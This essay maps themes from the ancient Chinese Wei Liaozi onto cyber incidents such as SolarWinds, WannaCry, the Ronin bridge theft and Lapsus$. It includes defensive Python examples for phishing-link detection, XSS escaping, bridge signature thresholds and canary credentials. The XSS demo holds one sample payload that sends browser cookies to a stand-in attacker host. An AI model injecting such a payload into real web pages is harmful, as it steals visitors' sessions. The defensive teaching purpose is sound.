The Wei Liaozi (尉繚子) and Modern Cyber Adversarial Tactics

"The greatest deception is the one that is not seen as deception."

The Wei Liaozi, one of the Seven Military Classics of ancient China, is attributed to Wei Liao, a military strategist of the Warring States period (475-221 BCE). It was written in an era of constant conflict and espionage, which is why so much of it concerns concealment, deception and intelligence.

Overview

The Wei Liaozi frequently advocates both a civil and military approach to affairs. According to the text, agriculture and people are the two greatest resources of the state, and both should be nurtured and provided for. The text advocates a government based on humanistic values where the ruler should be the paradigm of virtue in the state. The text also emphasizes the need for a strong and authoritarian ruler who is willing to employ draconian measures to maintain order and suppress heterodox or disruptive elements that may threaten the state's stability.

The Wei Liaozi covers a wide range of topics related to warfare, including:

  1. The importance of agriculture and the people to the state
  2. The need for a strong military to defend the state
  3. The importance of discipline and training for soldiers
  4. The different types of warfare and how to conduct them
  5. The importance of espionage and intelligence gathering
  6. The role of the ruler in leading the state to victory

Wars are sorted into righteous and unjust, and righteous wars rest on benevolence and virtue. The text counsels caution about going to war, but never fear of it.

Politics is fundamental and military affairs are subordinate. The economy is essential to managing state affairs and is the material foundation of war.

The Wei Liaozi stresses mental, material and organizational preparation before war, holding that in war an army should concentrate its strength, attack by surprise, and combine assault and defense at the same time [1].

Illustration of the Wei Liaozi

Covert Operations, Nature and Intelligence Gathering

Secrecy and Concealment:

The text emphasizes the importance of keeping operations hidden from the adversary's view. It recognizes that secrecy is often the key to success in both warfare and espionage.

"The greatest victory is the one that is won without a battle." (after Sun Tzu, The Art of War)

The SolarWinds compromise [2] is a good example of how attackers use secrecy and concealment to gain access to systems and networks. The attackers compromised the build environment of Orion, an IT management product from SolarWinds, and inserted a backdoor into an Orion update. The update was signed with SolarWinds' own code-signing certificate and delivered to customers through the normal update channel, so it looked like any other release. Once installed on a customer's network, the implant lay dormant for roughly two weeks before contacting its command-and-control infrastructure, then gave the attackers backdoor access to the network. Because it arrived as a legitimate, signed update, the intrusion went unnoticed for months.

Deception and Misdirection:

The Wei Liaozi advocates the use of deception to confuse and mislead the enemy. This includes tactics such as misinformation, feints, and disguises.

"Warfare is a game of deception."

Phishing emails are the most common form of social engineering and rely on deception and misdirection to trick people into revealing sensitive information or opening malicious links. They appear to come from a legitimate source, such as a bank or credit card company, and typically ask the recipient to click a link to "update" or "verify" account information. The link leads to a fake website that mimics the real one; when the recipient enters their login credentials there, the attackers capture them and can sign in to the real account. The deception lives in details a hurried reader skips: the visible link text names one domain while the URL points somewhere else, the domain differs from the real one by a single look-alike character, or the brand name is buried as a subdomain of an unrelated site.
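The indicators just described can be checked mechanically. The Python script below is an added example, not code from the original article: it extracts every link from an HTML e-mail body and flags display-text/target mismatches, homoglyph or one-character typo-squats of a protected brand, and brand names used as subdomains of unrelated domains. The protected-brand list, the confusable mapping and the sample e-mail are constructed for illustration, and the registrable-domain helper uses the last two labels of the hostname rather than a public-suffix list.

```python
"""Flag deceptive links in an HTML e-mail body.

Added example; not from the original article. The brand list, confusable
mapping, sample e-mail and heuristics are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical brands whose domains we want to protect from impersonation.
PROTECTED_DOMAINS = ["examplebank.com", "paypal.com"]

# Characters attackers commonly substitute for look-alikes.
_CONFUSABLES = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "|": "l"})

# Constructed phishing e-mail: three deceptive links and one legitimate one.
SAMPLE_EMAIL = """<p>Dear customer,</p>
<p>Please <a href="http://examp1ebank.com/verify">update your account</a> within 24 hours.</p>
<p>Or sign in at <a href="https://secure-login.evil.example/x">https://www.examplebank.com/login</a></p>
<p>Need help? <a href="https://paypal.com.account-check.example/">PayPal</a></p>
<p>Help centre: <a href="https://www.examplebank.com/help">www.examplebank.com/help</a></p>"""


def normalize(domain: str) -> str:
    """Fold common homoglyph substitutions so 'examp1ebank' == 'examplebank'."""
    return domain.lower().translate(_CONFUSABLES).replace("rn", "m").replace("vv", "w")


def registrable(host: str) -> str:
    """Last two labels of a hostname (no public-suffix list; fine for the example)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance, used to catch one-character typo-squats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs from <a> elements."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host_from_text(text: str):
    """If the link's visible text looks like a URL or domain, return its host."""
    if " " in text or "." not in text:
        return None
    return urlparse(text if "://" in text else "http://" + text).hostname


def analyze_links(html: str):
    """Return [(href, [reasons])] for every link that shows a phishing indicator."""
    collector = _LinkCollector()
    collector.feed(html)
    findings = []
    for href, text in collector.links:
        host = urlparse(href).hostname or ""
        target = registrable(host)
        reasons = []
        shown = _host_from_text(text)
        # 1. The visible text names one domain while the href points at another.
        if shown and registrable(shown) != target:
            reasons.append(f"displayed {registrable(shown)} but links to {target}")
        for brand in PROTECTED_DOMAINS:
            if target == brand:
                continue
            label, brand_label = target.split(".")[0], brand.split(".")[0]
            # 2. Homoglyph or one-character typo of a protected brand.
            if normalize(label) == brand_label or levenshtein(label, brand_label) == 1:
                reasons.append(f"look-alike of {brand}")
            # 3. Brand name used as a subdomain of an unrelated domain.
            elif brand_label in host.split("."):
                reasons.append(f"{brand} appears in hostname but registrable domain is {target}")
        if reasons:
            findings.append((href, reasons))
    return findings


if __name__ == "__main__":
    for link, why in analyze_links(SAMPLE_EMAIL):
        print(link, "->", "; ".join(why))
```

Run against the sample, the first three links are flagged for one reason each and the genuine help-centre link passes. In production the registrable-domain step should use a public-suffix list, and the confusable table should be replaced by a proper Unicode confusables check, since IDN homographs are not limited to digits.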

Surprise Attacks:

Surprise attacks are a recurring theme in the text. Wei Liao recognizes the value of launching unexpected offensives to catch the enemy off guard.

"The victor is the one who strikes first."

Zero-day attacks exploit vulnerabilities for which no patch yet exists, either because the vendor does not know about the flaw or because it has had "zero days" to fix it, so the defender has had no chance to prepare. WannaCry, the case described in [3], is often called a zero-day but was not one: the SMBv1 flaw it used had been patched by Microsoft in March 2017 (MS17-010), two months before the May 2017 outbreak, and the exploit code (EternalBlue) came from a leaked NSA toolkit. The surprise lay in speed rather than novelty. As a self-propagating worm, WannaCry infected more than 200,000 computers in over 150 countries within days, hitting organizations that had not yet applied the patch, and caused damage estimated in the billions of dollars [3].

Operational Security (OpSec):

OpSec, the practice of protecting the identities, intentions and activities of operatives, is a central concept. The text highlights the need to conceal one's plans and keep the enemy ignorant of one's movements. The principle cuts both ways in cyberspace: attackers practise OpSec to avoid attribution and detection, and they hunt for OpSec lapses on the defender's side, such as employees who post internal details publicly or reuse passwords across services, so organizations need strong security controls and staff who know what not to disclose.

"If you do not protect your secrets, your enemy will find out."

Attackers use a variety of techniques to maintain their own operational security, such as encryption, proxy servers and botnets. Encryption protects their communications from being read if intercepted; proxy servers and anonymizing networks hide their real IP addresses; and botnets let them launch attacks from a large number of unrelated IP addresses, making it difficult to trace an attack back to its operators.

Clandestine Infiltration:

Covert infiltration and espionage play a prominent role. The text explores methods of infiltrating enemy territory while avoiding detection. By gaining access to a secure area or system without being detected, hackers can steal data, install malware, or disrupt operations.

"If you know the enemy and know yourself, you need not fear the result of a hundred battles." (Sun Tzu, The Art of War, Giles translation)

Attackers often rely on clandestine infiltration to gain a foothold in systems and networks. For example, they might exploit a vulnerability in a website to plant malicious code in its pages (a stored cross-site scripting flaw, or a compromised script include in a watering-hole attack). That code then runs in the browser of every visitor, where it can steal session cookies, capture what the victim types on the page, or redirect them to an exploit kit; taking over the visitor's computer outright needs a further browser or plugin exploit on top. Attackers also use social engineering to talk employees into granting access to systems and networks.
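To make the planted-code case concrete, here is an added Python example, not code from the original article. It renders a constructed comment store into a page twice, once by concatenating raw input (the stored cross-site scripting flaw) and once with html.escape, and uses a small HTMLParser subclass as a stand-in for the browser to list what would execute in each version. The comment store, page template and attacker payloads are constructed for illustration.

```python
"""Stored XSS: the vulnerable rendering next to the escaped version.

Added example, not from the original article. The comment store, the page
template and the attacker payloads are constructed for illustration.
"""
import html
from html.parser import HTMLParser

# Constructed comment store; entries 2 and 3 are attacker submissions.
COMMENTS = [
    "Great article!",
    '<script>fetch("https://attacker.example/c?d=" + document.cookie)</script>',
    'Click <a href="javascript:alert(1)">here</a>',
]

PAGE = "<html><body><h1>Comments</h1><ul>{items}</ul></body></html>"


def render_unsafe(comments):
    """Vulnerable: user input is concatenated into the page as raw HTML."""
    return PAGE.format(items="".join(f"<li>{c}</li>" for c in comments))


def render_safe(comments):
    """Hardened: every comment is HTML-escaped, so markup is shown as text."""
    return PAGE.format(items="".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments))


class _ScriptFinder(HTMLParser):
    """Stand-in for the browser: collects inline script bodies and
    javascript: URLs, i.e. everything that would execute on load or click."""

    def __init__(self):
        super().__init__()
        self.executables = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if name in ("href", "src") and (value or "").lower().startswith("javascript:"):
                self.executables.append(value)

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.executables.append(data.strip())

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def executable_payloads(page_html: str):
    """Return the script bodies and javascript: URLs a browser would run."""
    finder = _ScriptFinder()
    finder.feed(page_html)
    return finder.executables


if __name__ == "__main__":
    print("unsafe:", executable_payloads(render_unsafe(COMMENTS)))
    print("safe:  ", executable_payloads(render_safe(COMMENTS)))
```

The unsafe page yields two executable payloads, the escaped page none. Escaping at output time is the general fix; the same idea applies to attribute and URL contexts, each of which needs its own encoder, and a Content-Security-Policy that forbids inline scripts limits the damage when an escape is missed.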

Subterfuge and Camouflage:

Wei Liaozi underscores the value of disguises and concealing one's true intentions. By deceiving and misdirecting their victims, hackers can gain access to systems and networks that would otherwise be off-limits.

"The greatest deception is the one that is not seen as deception."

Attackers use many forms of subterfuge and camouflage to avoid detection: phishing emails that trick people into revealing sensitive information, fake websites that mimic real ones, and social engineering to talk people into granting access to systems and networks. In March 2022 the Ronin network [4], the sidechain used by the popular play-to-earn game Axie Infinity, was robbed of roughly $600 million in cryptocurrency. The attackers reportedly approached a Sky Mavis engineer with a fake job offer and delivered malware through a booby-trapped offer document, which gave them a foothold inside the company. From there they obtained the private keys of five of the nine validators that sign Ronin bridge withdrawals: the four run by Sky Mavis, plus one run by the Axie DAO that Sky Mavis had been allow-listed to sign for during a period of heavy load months earlier and whose grant was never revoked. Five signatures met the bridge's threshold, so the forged withdrawals looked legitimate to the bridge, and the theft went unnoticed for about six days until a user was unable to withdraw funds.
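The bridge's k-of-n signing rule, and the effect of the stale allow-list grant, can be modelled in a few lines. The Python below is an added example, not Sky Mavis or Ronin code: it uses HMAC over a shared secret as a stand-in for validator signatures, a 5-of-9 threshold, and a constructed withdrawal message, and compares the outcome with the stale grant present, with it revoked, with a higher threshold, and with one forged signature corrupted.

```python
"""k-of-n validator approval and the cost of a stale allow-list grant.

Added example; not Sky Mavis / Ronin code. Validator keys, the 5-of-9
threshold, the withdrawal message and HMAC-as-signature are a constructed,
simplified model of a bridge's approval check.
"""
import hashlib
import hmac
import secrets

THRESHOLD = 5  # signatures required out of nine validators (as on Ronin)


def make_validators(n: int = 9) -> dict:
    """Constructed validator set: name -> secret signing key."""
    return {f"validator{i}": secrets.token_bytes(32) for i in range(1, n + 1)}


def sign(key: bytes, message: bytes) -> bytes:
    """HMAC stands in for an ECDSA signature; in this model the bridge
    holds the same key it verifies with."""
    return hmac.new(key, message, hashlib.sha256).digest()


def attacker_signatures(keys: dict, compromised: set, message: bytes) -> dict:
    """What an attacker can produce: valid signatures only for keys they hold."""
    return {name: sign(keys[name], message) for name in compromised}


def approve_withdrawal(message: bytes, signatures: dict, authorized: set,
                       keys: dict, threshold: int = THRESHOLD) -> bool:
    """Bridge-side check: count distinct, valid signatures from validators
    that are currently authorized, and approve only at or above the threshold."""
    valid = {
        name
        for name, sig in signatures.items()
        if name in authorized and name in keys
        and hmac.compare_digest(sig, sign(keys[name], message))
    }
    return len(valid) >= threshold


def scenario() -> dict:
    """Replay the structure of the Ronin theft in the model; return outcomes."""
    keys = make_validators(9)
    message = b"withdraw 173600 ETH to 0xattacker"  # constructed
    # Four operator-controlled validators plus one (validator5) whose signing
    # authority was delegated to the same operator earlier and never revoked.
    compromised = {f"validator{i}" for i in range(1, 6)}
    forged = attacker_signatures(keys, compromised, message)
    everyone = set(keys)
    corrupted = dict(forged, validator1=bytes(32))  # one bad signature
    return {
        "stale_grant_present": approve_withdrawal(message, forged, everyone, keys),
        "stale_grant_revoked": approve_withdrawal(message, forged, everyone - {"validator5"}, keys),
        "higher_threshold": approve_withdrawal(message, forged, everyone, keys, threshold=6),
        "one_bad_signature": approve_withdrawal(message, corrupted, everyone, keys),
    }


if __name__ == "__main__":
    for case, approved in scenario().items():
        print(f"{case:22s} approved={approved}")
```

Only the first case approves the forged withdrawal. The lesson is not about the signature scheme, which works as designed, but about the authorization set: a temporary grant that outlives its purpose lowers the effective threshold, and the bridge cannot tell a stolen key from an honest one.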

Intelligence Gathering:

Intelligence gathering is a cornerstone of the text's strategies. It stresses the importance of understanding the adversary's intentions and capabilities through information gathering.

"The key to victory is to know the enemy better than they know themselves."

Lapsus\$ is a relatively new group that has been involved in a number of high-profile attacks beginning in 2021. It is known for sophisticated social engineering rather than technical exploits, and for its willingness to target large organizations.

In 2022, Lapsus\$ breached Microsoft and claimed to have taken about 37GB of internal source code; Microsoft confirmed an intrusion through a single compromised account and said no customer code or data was involved. The group also hit Nvidia, stealing source code, driver material and code-signing certificates that were later used to sign malware, and Okta, a major identity and access management provider, where it reached Okta's support tooling through a compromised workstation at a third-party support contractor and gained a window into a subset of Okta customers' tenants. Cloudflare, an Okta customer, reported the incident publicly and, after rotating the credentials of employees who had changed passwords in the affected window, found no compromise of its own systems.

Lapsus\$ adopted two unusual methods. First, it stayed in constant communication with its audience through a Telegram channel with more than 45,000 subscribers, running polls on which victim's data to leak next and using the channel to find buyers for data it had already exfiltrated. Second, it openly advertised payment for credentials and internal network access (employee VPN or Citrix logins, insiders willing to approve multi-factor prompts), recruiting insiders and bombarding users with authentication requests rather than developing exploits. Further information on Lapsus\$ is available in the Cyber Safety Review Board report [5].


Early Warning Systems:

The Wei Liaozi recognizes the significance of early warning systems.

"He who knows the enemy and knows himself will win a hundred battles without fail." (after Sun Tzu, The Art of War)

Adversaries' early warning systems are hard to document precisely because they are covert. What can be observed is the behaviour such warning produces: malware that checks for sandboxes, debuggers and analysis tools before detonating, command-and-control infrastructure that is abandoned as soon as it appears on public blocklists, and operators who go quiet when researchers publish write-ups of their tooling. Even without direct evidence of a particular system, it is reasonable to assume that capable adversaries watch for signs that they have been noticed and adjust to stay ahead of detection.

Counterintelligence:

The text advocates counterintelligence efforts to identify and neutralize enemy spies.

"If you know the enemy's plans, you can defeat him."

As reported in [6], the US Department of Justice (DOJ) charged two Chinese hackers, working with China's Ministry of State Security, with stealing trade secrets from companies in the United States and abroad. The indictment alleges that they broke in by exploiting vulnerabilities in web-facing software, used web shells to keep their access, and took steps to hide their activity on victim systems, such as disguising stolen data before moving it out. The release describes charges, not an arrest. In cyberspace the closest analogue to identifying and neutralizing enemy spies is deception technology: honeypots, canary credentials and planted documents that have no legitimate use, so that any touch of them exposes an intruder who believed they were unobserved.
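A cyber counterintelligence control in this spirit is the canary credential: an account that exists only as bait, so any use of it, successful or not, is an alert. The Python below is an added example, not from the DOJ case or the original article. The canary account names, the simplified syslog-like log format and the sample log lines are constructed for illustration; it parses the lines, picks out every touch of a canary account, and groups them by source address so that one attacker probing several bait accounts produces one incident.

```python
"""Canary-credential detection over authentication logs.

Added example; not from the DOJ case or the original article. The canary
accounts, the log format and the sample lines are constructed.
"""
import re
from collections import defaultdict

# Hypothetical accounts that exist only as bait and are never used legitimately.
CANARY_ACCOUNTS = {"svc-backup-legacy", "admin-dr"}

# Constructed log lines in a simplified syslog-like format (two services).
SAMPLE_LOG = """\
2024-05-01T09:12:03Z auth sshd: Accepted password for alice from 10.0.4.12 port 51122
2024-05-01T09:13:44Z auth sshd: Failed password for svc-backup-legacy from 198.51.100.7 port 40211
2024-05-01T09:13:49Z auth sshd: Failed password for svc-backup-legacy from 198.51.100.7 port 40213
2024-05-01T09:14:01Z auth sshd: Accepted password for svc-backup-legacy from 198.51.100.7 port 40220
2024-05-01T09:20:15Z auth sshd: Accepted publickey for bob from 10.0.4.30 port 51200
2024-05-01T10:02:40Z auth vpn: login user=admin-dr src=203.0.113.9 result=success
"""

# One pattern with two alternatives: the sshd form and the vpn key=value form.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth (?P<service>\w+): (?:"
    r"(?P<result>Accepted|Failed) \w+ for (?P<user>\S+) from (?P<src>\S+)"
    r"|login user=(?P<user2>\S+) src=(?P<src2>\S+) result=(?P<result2>\w+))"
)


def parse_line(line: str):
    """Normalize one log line to {ts, service, user, src, success}, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    return {
        "ts": d["ts"],
        "service": d["service"],
        "user": d["user"] or d["user2"],
        "src": d["src"] or d["src2"],
        "success": (d["result"] or d["result2"]).lower() in ("accepted", "success"),
    }


def detect_canary_use(log_text: str) -> dict:
    """Return {source_ip: incident} for every source that touched a canary
    account. Failed attempts count too: a canary has no legitimate users,
    so even a wrong password means someone has the bait in hand."""
    incidents = defaultdict(
        lambda: {"users": set(), "attempts": 0, "successes": 0, "first": None, "last": None}
    )
    for line in log_text.splitlines():
        event = parse_line(line)
        if not event or event["user"] not in CANARY_ACCOUNTS:
            continue
        inc = incidents[event["src"]]
        inc["users"].add(event["user"])
        inc["attempts"] += 1
        inc["successes"] += int(event["success"])
        inc["first"] = inc["first"] or event["ts"]
        inc["last"] = event["ts"]
    return dict(incidents)


if __name__ == "__main__":
    for src, inc in detect_canary_use(SAMPLE_LOG).items():
        print(f"ALERT canary use from {src}: {sorted(inc['users'])} "
              f"{inc['attempts']} attempts, {inc['successes']} successful, "
              f"{inc['first']} .. {inc['last']}")
```

On the sample, 198.51.100.7 is flagged for three attempts (one successful) against the bait service account and 203.0.113.9 for a successful VPN login as the bait administrator, while alice and bob produce nothing. Canary accounts must carry no real privileges, and the credentials should be planted where an intruder would look (a config file, a password manager export, a wiki page), so that their use also tells you which cache the intruder found.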

Wei Liaozi emphasizes the importance of human intelligence (HUMINT) in warfare. HUMINT is the process of collecting information from human sources. This information can be used to understand the enemy's capabilities, intentions, and vulnerabilities.

Takeaway

The fundamental principle underlying the significance of understanding cyberpsychology and adversary tactics is the notion that an effective defense strategy should be informed by a thorough understanding of the tactics, techniques, and procedures employed by adversaries.

From traditional military maneuvers to the modern world of cyber warfare, the overarching goal remains consistent: to outmaneuver, deceive, and ultimately prevail against the adversary. The foundation of any robust defense strategy lies in the recognition that threats are not static; they adapt and evolve. Identification and analysis of adversarial tactics is like deciphering a complex puzzle, wherein each piece represents an aspect of the adversary's methodology. The goal is to piece together these fragments to form a comprehensive understanding of the threat landscape.

References

[1] en.chinaculture.org

[2] https://www.npr.org/2021/04/16/985439655/a-worst-nightmare-cyberattack-the-untold-story-of-the-solarwinds-hack

[3] https://www.sdxcentral.com/security/definitions/what-is-ransomware/case-study-wannacry-ransomware/

[4] https://www.cnet.com/personal-finance/crypto/a-fake-job-offer-reportedly-led-to-axie-infinitys-600m-hack/

[5] https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf

[6] https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion
